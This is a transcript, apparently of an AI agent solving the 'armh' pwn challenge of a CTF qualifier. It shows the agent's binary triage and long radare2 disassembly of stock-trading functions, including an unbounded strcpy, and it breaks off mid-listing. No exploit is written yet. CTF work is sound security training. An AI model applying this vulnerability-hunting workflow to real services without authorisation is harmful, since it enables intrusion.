# Thread Handoff - Thread: calm-vector-2977 - UUID: ce602d5a-22e0-4b7e-b021-92d6146aee47 - CTF: midnight-sun-ctf-2026-quals - Challenge: armh - Runtime: codex - Model: gpt-5.5 - Status: completed ## Transcript - **Assistant:** I’ll start by inventorying `/challenge` and identifying the challenge type. I’ll also send concise progress notes to the provided webhook when there are concrete findings or failed approaches. - **Assistant:** The bundle is a pwn-style distribution: an AArch64 ELF plus matching loader/libc. I’m checking the binary properties and first-pass symbols/strings now. - **Assistant:** [*] '/challenge/armh-dist/armh' Arch: aarch64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled Stripped: No - **Assistant:** The binary is not stripped, so the named functions are enough to guide static analysis. I’m going function-by-function now to find the money/portfolio bug before trying the remote service. - **Assistant:** INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0 INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0 ; CALL XREF from main @ 0x1d8c(x) ┌ 480: sym.sell_stock (int64_t arg_60h); │ `- args() vars(13:sp[0x8..0x5c]) │ 0x000013ac ff8301d1 sub sp, sp, 0x60 │ 0x000013b0 fd7b05a9 stp x29, x30, [var_50h] │ 0x000013b4 fd430191 add x29, sp, 0x50 │ 0x000013b8 800000b0 adrp x0, 0x12000 │ 0x000013bc 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000013c0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000013c4 e12700f9 str x1, [var_48h] │ 0x000013c8 010080d2 mov x1, 0 │ 0x000013cc ffff01a9 stp xzr, xzr, [var_18h] │ 0x000013d0 ffff02a9 stp xzr, xzr, [var_28h] │ 0x000013d4 ffff03a9 stp xzr, xzr, [var_38h] │ 0x000013d8 ff0700b9 str wzr, [var_4h] │ 0x000013dc e1130091 add x1, sp, 4 ; int64_t arg2 │ 0x000013e0 e0630091 add x0, sp, 0x18 ; int64_t arg1 │ 0x000013e4 54feff97 bl sym.get_symbol_quantity │ 0x000013e8 e0630091 add x0, sp, 0x18 ; int64_t arg1 │ 0x000013ec 32ffff97 bl sym.find_user_stock │ 0x000013f0 e00b00b9 str w0, [var_4h] │ 0x000013f4 e00b40b9 ldr w0, [var_4h] │ 0x000013f8 1f040031 cmn w0, 1 │ ┌─< 0x000013fc 61000054 b.ne 0x1408 │ │ 0x00001400 00008012 mov w0, -1 │ ┌──< 0x00001404 55000014 b 0x1558 │ ││ ; CODE XREF from sym.sell_stock @ 0x13fc(x) │ │└─> 0x00001408 800000f0 adrp x0, 0x14000 │ │ 0x0000140c 01600491 add x1, x0, 0x118 ; 0x14118 │ │ ; obj.user_stocks │ │ 0x00001410 e00b80b9 ldrsw x0, [var_4h] │ │ 0x00001414 00e47ad3 lsl x0, x0, 6 │ │ 0x00001418 2000008b add x0, x1, x0 ; 0x14118 │ │ ; obj.user_stocks │ │ 0x0000141c 013840b9 ldr w1, [x0, 0x38] │ │ 0x00001420 e00740b9 ldr w0, [var_4h] │ │ 0x00001424 3f00006b cmp w1, w0 │ │┌─< 0x00001428 62000054 b.hs 0x1434 │ ││ 0x0000142c 20008012 mov w0, -2 │ ┌───< 0x00001430 4a000014 b 0x1558 │ │││ ; CODE XREF from sym.sell_stock @ 0x1428(x) │ ││└─> 0x00001434 e0630091 add x0, sp, 0x18 ; int64_t arg1 │ ││ 0x00001438 ddfeff97 bl sym.find_stock │ ││ 0x0000143c e00f00b9 str w0, [format] │ ││ 0x00001440 e00f40b9 ldr w0, [format] │ ││ 0x00001444 1f040031 cmn w0, 1 │ ││┌─< 0x00001448 61000054 b.ne 0x1454 │ │││ 0x0000144c 00008012 mov w0, -1 │ ┌────< 0x00001450 42000014 b 0x1558 │ ││││ ; CODE XREF from sym.sell_stock @ 0x1448(x) │ │││└─> 0x00001454 800000b0 adrp x0, 0x12000 │ │││ 0x00001458 01602091 add x1, x0, 0x818 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x0000145c e00f80b9 ldrsw x0, [format] │ │││ 0x00001460 00e47ad3 lsl x0, x0, 6 │ │││ 0x00001464 2000008b add x0, x1, x0 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x00001468 001840fd ldr d0, [x0, 0x30] │ │││ 0x0000146c 00000090 adrp x0, 0x1000 │ │││ 0x00001470 00c03b91 add x0, x0, 0xef0 ; 0x1ef0 ; "Selling at $%.2f\n" ; const char *format │ │││ 0x00001474 8bfdff97 bl sym.imp.printf ; int printf(const char *format) │ │││ 0x00001478 800000f0 adrp x0, 0x14000 │ │││ 0x0000147c 01600491 add x1, x0, 0x118 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x00001480 e00b80b9 ldrsw x0, [var_4h] │ │││ 0x00001484 00e47ad3 lsl x0, x0, 6 │ │││ 0x00001488 2000008b add x0, x1, x0 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x0000148c 001840fd ldr d0, [x0, 0x30] │ │││ 0x00001490 00000090 adrp x0, 0x1000 │ │││ 0x00001494 00203c91 add x0, x0, 0xf08 ; 0x1f08 ; "Purchased at $%.2f\n" ; const char *format │ │││ 0x00001498 82fdff97 bl sym.imp.printf ; int printf(const char *format) │ │││ 0x0000149c 800000b0 adrp x0, 0x12000 │ │││ 0x000014a0 01602091 add x1, x0, 0x818 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x000014a4 e00f80b9 ldrsw x0, [format] │ │││ 0x000014a8 00e47ad3 lsl x0, x0, 6 │ │││ 0x000014ac 2000008b add x0, x1, x0 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x000014b0 011840fd ldr d1, [x0, 0x30] │ │││ 0x000014b4 e00740b9 ldr w0, [var_4h] │ │││ 0x000014b8 0000631e ucvtf d0, w0 │ │││ 0x000014bc 2008601e fmul d0, d1, d0 │ │││ 0x000014c0 e00b00fd str d0, [var_10h] │ │││ 0x000014c4 800000b0 adrp x0, 0x12000 │ │││ 0x000014c8 00202091 add x0, x0, 0x808 ; 0x12808 │ │││ ; obj.money │ │││ 0x000014cc 010040fd ldr d1, [x0] ; [0x12808:8]=0x40c3880000000000 ; obj.money │ │││ 0x000014d0 e00b40fd ldr d0, [var_10h] │ │││ 0x000014d4 2028601e fadd d0, d1, d0 │ │││ 0x000014d8 800000b0 adrp x0, 0x12000 │ │││ 0x000014dc 00202091 add x0, x0, 0x808 ; 0x12808 │ │││ ; obj.money │ │││ 0x000014e0 000000fd str d0, [x0] ; 0x12808 │ │││ ; obj.money │ │││ 0x000014e4 800000b0 adrp x0, 0x12000 │ │││ 0x000014e8 01602091 add x1, x0, 0x818 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x000014ec e00f80b9 ldrsw x0, [format] │ │││ 0x000014f0 00e47ad3 lsl x0, x0, 6 │ │││ 0x000014f4 2000008b add x0, x1, x0 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x000014f8 013840b9 ldr w1, [x0, 0x38] │ │││ 0x000014fc e00740b9 ldr w0, [var_4h] │ │││ 0x00001500 2100000b add w1, w1, w0 │ │││ 0x00001504 800000b0 adrp x0, 0x12000 │ │││ 0x00001508 02602091 add x2, x0, 0x818 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x0000150c e00f80b9 ldrsw x0, [format] │ │││ 0x00001510 00e47ad3 lsl x0, x0, 6 │ │││ 0x00001514 4000008b add x0, x2, x0 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x00001518 013800b9 str w1, [x0, 0x38] │ │││ 0x0000151c 800000f0 adrp x0, 0x14000 │ │││ 0x00001520 01600491 add x1, x0, 0x118 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x00001524 e00b80b9 ldrsw x0, [var_4h] │ │││ 0x00001528 00e47ad3 lsl x0, x0, 6 │ │││ 0x0000152c 2000008b add x0, x1, x0 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x00001530 013840b9 ldr w1, [x0, 0x38] │ │││ 0x00001534 e00740b9 ldr w0, [var_4h] │ │││ 0x00001538 2100004b sub w1, w1, w0 │ │││ 0x0000153c 800000f0 adrp x0, 0x14000 │ │││ 0x00001540 02600491 add x2, x0, 0x118 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x00001544 e00b80b9 ldrsw x0, [var_4h] │ │││ 0x00001548 00e47ad3 lsl x0, x0, 6 │ │││ 0x0000154c 4000008b add x0, x2, x0 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x00001550 013800b9 str w1, [x0, 0x38] │ │││ 0x00001554 00008052 mov w0, 0 │ │││ ; CODE XREFS from sym.sell_stock @ 0x1404(x), 0x1430(x), 0x1450(x) │ └└└──> 0x00001558 e103002a mov w1, w0 │ 0x0000155c 800000b0 adrp x0, 0x12000 │ 0x00001560 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001564 e32740f9 ldr x3, [var_48h] │ 0x00001568 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x0000156c 630002eb subs x3, x3, x2 │ 0x00001570 020080d2 mov x2, 0 │ ┌─< 0x00001574 40000054 b.eq 0x157c │ │ 0x00001578 26fdff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.sell_stock @ 0x1574(x) │ └─> 0x0000157c e003012a mov w0, w1 │ 0x00001580 fd7b45a9 ldp x29, x30, [var_50h] │ 0x00001584 ff830191 add sp, sp, 0x60 ; 0x178000 └ 0x00001588 c0035fd6 ret ; CALL XREF from main @ 0x1d60(x) ┌ 532: sym.buy_stock (int64_t arg_60h); │ `- args() vars(13:sp[0x8..0x5c]) │ 0x00001198 ff8301d1 sub sp, sp, 0x60 │ 0x0000119c fd7b05a9 stp x29, x30, [var_50h] │ 0x000011a0 fd430191 add x29, sp, 0x50 │ 0x000011a4 800000b0 adrp x0, 0x12000 │ 0x000011a8 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000011ac 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000011b0 e12700f9 str x1, [var_48h] │ 0x000011b4 010080d2 mov x1, 0 │ 0x000011b8 ffff01a9 stp xzr, xzr, [src] │ 0x000011bc ffff02a9 stp xzr, xzr, [var_28h] │ 0x000011c0 ffff03a9 stp xzr, xzr, [var_38h] │ 0x000011c4 ff0700b9 str wzr, [var_4h] │ 0x000011c8 e1130091 add x1, sp, 4 ; int64_t arg2 │ 0x000011cc e0630091 add x0, sp, 0x18 ; int64_t arg1 │ 0x000011d0 d9feff97 bl sym.get_symbol_quantity │ 0x000011d4 e0630091 add x0, sp, 0x18 ; char *arg1 │ 0x000011d8 75ffff97 bl sym.find_stock │ 0x000011dc e00b00b9 str w0, [var_4h] │ 0x000011e0 e00b40b9 ldr w0, [var_4h] │ 0x000011e4 e00f00b9 str w0, [var_ch] │ 0x000011e8 e00b40b9 ldr w0, [var_4h] │ 0x000011ec 1f040031 cmn w0, 1 │ ┌─< 0x000011f0 61000054 b.ne 0x11fc │ │ 0x000011f4 00008012 mov w0, -1 │ ┌──< 0x000011f8 60000014 b 0x1378 │ ││ ; CODE XREF from sym.buy_stock @ 0x11f0(x) │ │└─> 0x000011fc 800000b0 adrp x0, 0x12000 │ │ 0x00001200 01602091 add x1, x0, 0x818 ; 0x12818 │ │ ; obj.stocks │ │ 0x00001204 e00b80b9 ldrsw x0, [var_4h] │ │ 0x00001208 00e47ad3 lsl x0, x0, 6 │ │ 0x0000120c 2000008b add x0, x1, x0 ; 0x12818 │ │ ; obj.stocks │ │ 0x00001210 011840fd ldr d1, [x0, 0x30] │ │ 0x00001214 e00740b9 ldr w0, [var_4h] │ │ 0x00001218 0000631e ucvtf d0, w0 │ │ 0x0000121c 2008601e fmul d0, d1, d0 │ │ 0x00001220 e00b00fd str d0, [var_10h] │ │ 0x00001224 800000b0 adrp x0, 0x12000 │ │ 0x00001228 00202091 add x0, x0, 0x808 ; 0x12808 │ │ ; obj.money │ │ 0x0000122c 000040fd ldr d0, [x0] ; [0x12808:8]=0x40c3880000000000 ; obj.money │ │ 0x00001230 e10b40fd ldr d1, [var_10h] │ │ 0x00001234 3020601e fcmpe d1, d0 │ │┌─< 0x00001238 4c000054 b.gt 0x1240 │ ┌───< 0x0000123c 03000014 b 0x1248 │ │││ ; CODE XREF from sym.buy_stock @ 0x1238(x) │ ││└─> 0x00001240 20008012 mov w0, -2 │ ││┌─< 0x00001244 4d000014 b 0x1378 │ │││ ; CODE XREF from sym.buy_stock @ 0x123c(x) │ └───> 0x00001248 800000b0 adrp x0, 0x12000 │ ││ 0x0000124c 00202091 add x0, x0, 0x808 ; 0x12808 │ ││ ; obj.money │ ││ 0x00001250 010040fd ldr d1, [x0] ; [0x12808:8]=0x40c3880000000000 ; obj.money │ ││ 0x00001254 e00b40fd ldr d0, [var_10h] │ ││ 0x00001258 2038601e fsub d0, d1, d0 │ ││ 0x0000125c 800000b0 adrp x0, 0x12000 │ ││ 0x00001260 00202091 add x0, x0, 0x808 ; 0x12808 │ ││ ; obj.money │ ││ 0x00001264 000000fd str d0, [x0] ; 0x12808 │ ││ ; obj.money │ ││ 0x00001268 e0630091 add x0, sp, 0x18 ; char *arg1 │ ││ 0x0000126c 92ffff97 bl sym.find_user_stock │ ││ 0x00001270 e00b00b9 str w0, [var_4h] │ ││ 0x00001274 e00b40b9 ldr w0, [var_4h] │ ││ 0x00001278 1f040031 cmn w0, 1 │ ┌───< 0x0000127c c1020054 b.ne 0x12d4 │ │││ 0x00001280 a0000090 adrp x0, 0x15000 │ │││ 0x00001284 00702891 add x0, x0, 0xa1c ; 0x15a1c │ │││ ; obj.num_user_stocks │ │││ 0x00001288 000040b9 ldr w0, [x0] ; [0x15a1c:8]=0 │ │││ ; obj.num_user_stocks │ │││ 0x0000128c e003002a mov w0, w0 │ │││ 0x00001290 01e47ad3 lsl x1, x0, 6 │ │││ 0x00001294 800000f0 adrp x0, 0x14000 │ │││ 0x00001298 00600491 add x0, x0, 0x118 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x0000129c 2000008b add x0, x1, x0 ; 0x14118 │ │││ ; obj.user_stocks ; char *dest │ │││ 0x000012a0 e1630091 add x1, sp, 0x18 ; const char *src │ │││ 0x000012a4 f3fdff97 bl sym.imp.strcpy ; char *strcpy(char *dest, const char *src) │ │││ 0x000012a8 a0000090 adrp x0, 0x15000 │ │││ 0x000012ac 00702891 add x0, x0, 0xa1c ; 0x15a1c │ │││ ; obj.num_user_stocks │ │││ 0x000012b0 000040b9 ldr w0, [x0] ; [0x15a1c:8]=0 │ │││ ; obj.num_user_stocks │ │││ 0x000012b4 e00b00b9 str w0, [var_4h] │ │││ 0x000012b8 a0000090 adrp x0, 0x15000 │ │││ 0x000012bc 00702891 add x0, x0, 0xa1c ; 0x15a1c │ │││ ; obj.num_user_stocks │ │││ 0x000012c0 000040b9 ldr w0, [x0] ; [0x15a1c:8]=0 │ │││ ; obj.num_user_stocks │ │││ 0x000012c4 01040011 add w1, w0, 1 │ │││ 0x000012c8 a0000090 adrp x0, 0x15000 │ │││ 0x000012cc 00702891 add x0, x0, 0xa1c ; 0x15a1c │ │││ ; obj.num_user_stocks │ │││ 0x000012d0 010000b9 str w1, [x0] ; 0x15a1c │ │││ ; obj.num_user_stocks │ │││ ; CODE XREF from sym.buy_stock @ 0x127c(x) │ └───> 0x000012d4 800000f0 adrp x0, 0x14000 │ ││ 0x000012d8 01600491 add x1, x0, 0x118 ; 0x14118 │ ││ ; obj.user_stocks │ ││ 0x000012dc e00b80b9 ldrsw x0, [var_4h] │ ││ 0x000012e0 00e47ad3 lsl x0, x0, 6 │ ││ 0x000012e4 2000008b add x0, x1, x0 ; 0x14118 │ ││ ; obj.user_stocks │ ││ 0x000012e8 013840b9 ldr w1, [x0, 0x38] │ ││ 0x000012ec e00740b9 ldr w0, [var_4h] │ ││ 0x000012f0 2100000b add w1, w1, w0 │ ││ 0x000012f4 800000f0 adrp x0, 0x14000 │ ││ 0x000012f8 02600491 add x2, x0, 0x118 ; 0x14118 │ ││ ; obj.user_stocks │ ││ 0x000012fc e00b80b9 ldrsw x0, [var_4h] │ ││ 0x00001300 00e47ad3 lsl x0, x0, 6 │ ││ 0x00001304 4000008b add x0, x2, x0 ; 0x14118 │ ││ ; obj.user_stocks │ ││ 0x00001308 013800b9 str w1, [x0, 0x38] │ ││ 0x0000130c 800000b0 adrp x0, 0x12000 │ ││ 0x00001310 01602091 add x1, x0, 0x818 ; 0x12818 │ ││ ; obj.stocks │ ││ 0x00001314 e00f80b9 ldrsw x0, [var_ch] │ ││ 0x00001318 00e47ad3 lsl x0, x0, 6 │ ││ 0x0000131c 2000008b add x0, x1, x0 ; 0x12818 │ ││ ; obj.stocks │ ││ 0x00001320 013840b9 ldr w1, [x0, 0x38] │ ││ 0x00001324 e00740b9 ldr w0, [var_4h] │ ││ 0x00001328 2100004b sub w1, w1, w0 │ ││ 0x0000132c 800000b0 adrp x0, 0x12000 │ ││ 0x00001330 02602091 add x2, x0, 0x818 ; 0x12818 │ ││ ; obj.stocks │ ││ 0x00001334 e00f80b9 ldrsw x0, [var_ch] │ ││ 0x00001338 00e47ad3 lsl x0, x0, 6 │ ││ 0x0000133c 4000008b add x0, x2, x0 ; 0x12818 │ ││ ; obj.stocks │ ││ 0x00001340 013800b9 str w1, [x0, 0x38] │ ││ 0x00001344 800000b0 adrp x0, 0x12000 │ ││ 0x00001348 01602091 add x1, x0, 0x818 ; 0x12818 │ ││ ; obj.stocks │ ││ 0x0000134c e00f80b9 ldrsw x0, [var_ch] │ ││ 0x00001350 00e47ad3 lsl x0, x0, 6 │ ││ 0x00001354 2000008b add x0, x1, x0 ; 0x12818 │ ││ ; obj.stocks │ ││ 0x00001358 001840fd ldr d0, [x0, 0x30] │ ││ 0x0000135c 800000f0 adrp x0, 0x14000 │ ││ 0x00001360 01600491 add x1, x0, 0x118 ; 0x14118 │ ││ ; obj.user_stocks │ ││ 0x00001364 e00b80b9 ldrsw x0, [var_4h] │ ││ 0x00001368 00e47ad3 lsl x0, x0, 6 │ ││ 0x0000136c 2000008b add x0, x1, x0 ; 0x14118 │ ││ ; obj.user_stocks │ ││ 0x00001370 001800fd str d0, [x0, 0x30] │ ││ 0x00001374 00008052 mov w0, 0 │ ││ ; CODE XREFS from sym.buy_stock @ 0x11f8(x), 0x1244(x) │ └└─> 0x00001378 e103002a mov w1, w0 │ 0x0000137c 800000b0 adrp x0, 0x12000 │ 0x00001380 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001384 e32740f9 ldr x3, [var_48h] │ 0x00001388 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x0000138c 630002eb subs x3, x3, x2 │ 0x00001390 020080d2 mov x2, 0 │ ┌─< 0x00001394 40000054 b.eq 0x139c │ │ 0x00001398 9efdff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.buy_stock @ 0x1394(x) │ └─> 0x0000139c e003012a mov w0, w1 │ 0x000013a0 fd7b45a9 ldp x29, x30, [var_50h] │ 0x000013a4 ff830191 add sp, sp, 0x60 ; 0x178000 └ 0x000013a8 c0035fd6 ret - **Assistant:** INFO: Propagate noreturn information (aanr) INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0 INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0 ; CALL XREF from main @ 0x1dc0(x) ┌ 540: sym.short_sell (int64_t arg_30h); │ `- args() vars(6:sp[0x8..0x24]) │ 0x0000158c ffc300d1 sub sp, sp, 0x30 │ 0x00001590 fd7b02a9 stp x29, x30, [var_20h] │ 0x00001594 fd830091 add x29, sp, 0x20 │ 0x00001598 800000b0 adrp x0, 0x12000 │ 0x0000159c 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000015a0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000015a4 e10f00f9 str x1, [var_18h] │ 0x000015a8 010080d2 mov x1, 0 │ 0x000015ac ff1300b9 str wzr, [var_10h] │ 0x000015b0 ff1700b9 str wzr, [var_10h] │ 0x000015b4 a0000090 adrp x0, 0x15000 │ 0x000015b8 00802891 add x0, x0, sym.imp.close ; 0xa20 │ 0x000015bc 000040fd ldr d0, [x0] ; [0x15a20:8]=0 │ ; obj.shorting_capacity │ 0x000015c0 200be8d2 mov x0, 0x4059000000000000 │ 0x000015c4 0100679e fmov d1, x0 │ 0x000015c8 1020611e fcmpe d0, d1 │ ┌─< 0x000015cc 44000054 b.mi 0x15d4 │ ┌──< 0x000015d0 06000014 b 0x15e8 │ ││ ; CODE XREF from sym.short_sell @ 0x15cc(x) │ │└─> 0x000015d4 00000090 adrp x0, 0x1000 │ │ 0x000015d8 00803c91 add x0, x0, 0xf20 ; 0x1f20 ; "You do not have sufficient funds to short." ; const char *s │ │ 0x000015dc 1dfdff97 bl sym.imp.puts ; int puts(const char *s) │ │ 0x000015e0 00008012 mov w0, -1 │ │┌─< 0x000015e4 64000014 b 0x1774 │ ││ ; CODE XREF from sym.short_sell @ 0x15d0(x) │ └──> 0x000015e8 ff0f00b9 str wzr, [format] │ ┌──< 0x000015ec 1c000014 b 0x165c │ ││ ; CODE XREF from sym.short_sell @ 0x1664(x) │ ┌───> 0x000015f0 800000b0 adrp x0, 0x12000 │ ╎││ 0x000015f4 01602091 add x1, x0, 0x818 ; 0x12818 │ ╎││ ; obj.stocks │ ╎││ 0x000015f8 e00f80b9 ldrsw x0, [format] │ ╎││ 0x000015fc 00e47ad3 lsl x0, x0, 6 │ ╎││ 0x00001600 2000008b add x0, x1, x0 ; 0x12818 │ ╎││ ; obj.stocks │ ╎││ 0x00001604 003840b9 ldr w0, [x0, 0x38] │ ╎││ 0x00001608 1f000071 cmp w0, 0 │ ┌────< 0x0000160c 20020054 b.eq 0x1650 │ │╎││ 0x00001610 e00f80b9 ldrsw x0, [format] │ │╎││ 0x00001614 01e47ad3 lsl x1, x0, 6 │ │╎││ 0x00001618 800000b0 adrp x0, 0x12000 │ │╎││ 0x0000161c 00602091 add x0, x0, 0x818 ; 0x12818 │ │╎││ ; obj.stocks │ │╎││ 0x00001620 2200008b add x2, x1, x0 ; 0x12818 │ │╎││ ; obj.stocks │ │╎││ 0x00001624 800000b0 adrp x0, 0x12000 │ │╎││ 0x00001628 01602091 add x1, x0, 0x818 ; 0x12818 │ │╎││ ; obj.stocks │ │╎││ 0x0000162c e00f80b9 ldrsw x0, [format] │ │╎││ 0x00001630 00e47ad3 lsl x0, x0, 6 │ │╎││ 0x00001634 2000008b add x0, x1, x0 ; 0x12818 │ │╎││ ; obj.stocks │ │╎││ 0x00001638 003840b9 ldr w0, [x0, 0x38] │ │╎││ 0x0000163c e303002a mov w3, w0 │ │╎││ 0x00001640 e10f40b9 ldr w1, [format] │ │╎││ 0x00001644 00000090 adrp x0, 0x1000 │ │╎││ 0x00001648 00403d91 add x0, x0, 0xf50 ; 0x1f50 ; "%d. %s: %d shares\n" ; const char *format │ │╎││ 0x0000164c 15fdff97 bl sym.imp.printf ; int printf(const char *format) │ │╎││ ; CODE XREF from sym.short_sell @ 0x160c(x) │ └────> 0x00001650 e00f40b9 ldr w0, [format] │ ╎││ 0x00001654 00040011 add w0, w0, 1 │ ╎││ 0x00001658 e00f00b9 str w0, [format] │ ╎││ ; CODE XREF from sym.short_sell @ 0x15ec(x) │ ╎└──> 0x0000165c e00f40b9 ldr w0, [format] │ ╎ │ 0x00001660 1f8c0171 cmp w0, 0x63 ; 'c' │ └───< 0x00001664 6dfcff54 b.le 0x15f0 │ │ 0x00001668 00000090 adrp x0, 0x1000 │ │ 0x0000166c 00a03d91 add x0, x0, 0xf68 ; 0x1f68 ; "Stock to Short:" ; const char *format │ │ 0x00001670 0cfdff97 bl sym.imp.printf ; int printf(const char *format) │ │ 0x00001674 96fdff97 bl sym.read_int │ │ 0x00001678 e01300b9 str w0, [var_10h] │ │ 0x0000167c e01340b9 ldr w0, [var_10h] │ │ 0x00001680 1f900171 cmp w0, 0x64 ; 'd' │ ┌──< 0x00001684 cd000054 b.le 0x169c │ ││ 0x00001688 00000090 adrp x0, 0x1000 │ ││ 0x0000168c 00003e91 add x0, x0, 0xf80 ; 0x1f80 ; "No such stock" ; const char *s │ ││ 0x00001690 f0fcff97 bl sym.imp.puts ; int puts(const char *s) │ ││ 0x00001694 00008012 mov w0, -1 │ ┌───< 0x00001698 37000014 b 0x1774 │ │││ ; CODE XREF from sym.short_sell @ 0x1684(x) │ │└──> 0x0000169c 00000090 adrp x0, 0x1000 │ │ │ 0x000016a0 00c03a91 add x0, x0, 0xeb0 ; 0x1eb0 ; "Quantity:" ; const char *format │ │ │ 0x000016a4 fffcff97 bl sym.imp.printf ; int printf(const char *format) │ │ │ 0x000016a8 800000b0 adrp x0, 0x12000 │ │ │ 0x000016ac 01602091 add x1, x0, 0x818 ; 0x12818 │ │ │ ; obj.stocks │ │ │ 0x000016b0 e01380b9 ldrsw x0, [var_10h] │ │ │ 0x000016b4 00e47ad3 lsl x0, x0, 6 │ │ │ 0x000016b8 2000008b add x0, x1, x0 ; 0x12818 │ │ │ ; obj.stocks │ │ │ 0x000016bc 003840b9 ldr w0, [x0, 0x38] │ │ │ 0x000016c0 e11740b9 ldr w1, [var_10h] │ │ │ 0x000016c4 3f00006b cmp w1, w0 │ │┌──< 0x000016c8 c9000054 b.ls 0x16e0 │ │││ 0x000016cc 00000090 adrp x0, 0x1000 │ │││ 0x000016d0 00403e91 add x0, x0, 0xf90 ; 0x1f90 ; "No such quantity available" ; const char *s │ │││ 0x000016d4 dffcff97 bl sym.imp.puts ; int puts(const char *s) │ │││ 0x000016d8 00008012 mov w0, -1 │ ┌────< 0x000016dc 26000014 b 0x1774 │ ││││ ; CODE XREF from sym.short_sell @ 0x16c8(x) │ ││└──> 0x000016e0 7bfdff97 bl sym.read_int │ ││ ��� 0x000016e4 e01700b9 str w0, [var_10h] │ ││ │ 0x000016e8 e01740b9 ldr w0, [var_10h] │ ││ │ 0x000016ec 0100631e ucvtf d1, w0 │ ││ │ 0x000016f0 800000b0 adrp x0, 0x12000 │ ││ │ 0x000016f4 01602091 add x1, x0, 0x818 ; 0x12818 │ ││ │ ; obj.stocks │ ││ │ 0x000016f8 e01380b9 ldrsw x0, [var_10h] │ ││ │ 0x000016fc 00e47ad3 lsl x0, x0, 6 │ ││ │ 0x00001700 2000008b add x0, x1, x0 ; 0x12818 │ ││ │ ; obj.stocks │ ││ │ 0x00001704 001840fd ldr d0, [x0, 0x30] │ ││ │ 0x00001708 2108601e fmul d1, d1, d0 │ ││ │ 0x0000170c a0000090 adrp x0, 0x15000 │ ││ │ 0x00001710 00802891 add x0, x0, sym.imp.close ; 0xa20 │ ││ │ 0x00001714 000040fd ldr d0, [x0] ; [0x15a20:8]=0 │ ││ │ ; obj.shorting_capacity │ ││ │ 0x00001718 3020601e fcmpe d1, d0 │ ││┌──< 0x0000171c 4c000054 b.gt 0x1724 │ ┌─────< 0x00001720 06000014 b 0x1738 │ │││││ ; CODE XREF from sym.short_sell @ 0x171c(x) │ │││└──> 0x00001724 00000090 adrp x0, 0x1000 │ │││ │ 0x00001728 00c03e91 add x0, x0, 0xfb0 ; 0x1fb0 ; "You are not allowed to short that much" ; const char *s │ │││ │ 0x0000172c c9fcff97 bl sym.imp.puts ; int puts(const char *s) │ │││ │ 0x00001730 00008012 mov w0, -1 │ │││┌──< 0x00001734 10000014 b 0x1774 │ │││││ ; CODE XREF from sym.short_sell @ 0x1720(x) │ └─────> 0x00001738 800000b0 adrp x0, 0x12000 │ ││││ 0x0000173c 01602091 add x1, x0, 0x818 ; 0x12818 │ ││││ ; obj.stocks │ ││││ 0x00001740 e01380b9 ldrsw x0, [var_10h] │ ││││ 0x00001744 00e47ad3 lsl x0, x0, 6 │ ││││ 0x00001748 2000008b add x0, x1, x0 ; 0x12818 │ ││││ ; obj.stocks │ ││││ 0x0000174c 013840b9 ldr w1, [x0, 0x38] │ ││││ 0x00001750 e01740b9 ldr w0, [var_10h] │ ││││ 0x00001754 2100004b sub w1, w1, w0 │ ││││ 0x00001758 800000b0 adrp x0, 0x12000 │ ││││ 0x0000175c 02602091 add x2, x0, 0x818 ; 0x12818 │ ││││ ; obj.stocks │ ││││ 0x00001760 e01380b9 ldrsw x0, [var_10h] │ ││││ 0x00001764 00e47ad3 lsl x0, x0, 6 │ ││││ 0x00001768 4000008b add x0, x2, x0 ; 0x12818 │ ││││ ; obj.stocks │ ││││ 0x0000176c 013800b9 str w1, [x0, 0x38] │ ││││ 0x00001770 00008052 mov w0, 0 │ ││││ ; CODE XREFS from sym.short_sell @ 0x15e4(x), 0x1698(x), 0x16dc(x), 0x1734(x) │ └└└└─> 0x00001774 e103002a mov w1, w0 │ 0x00001778 800000b0 adrp x0, 0x12000 │ 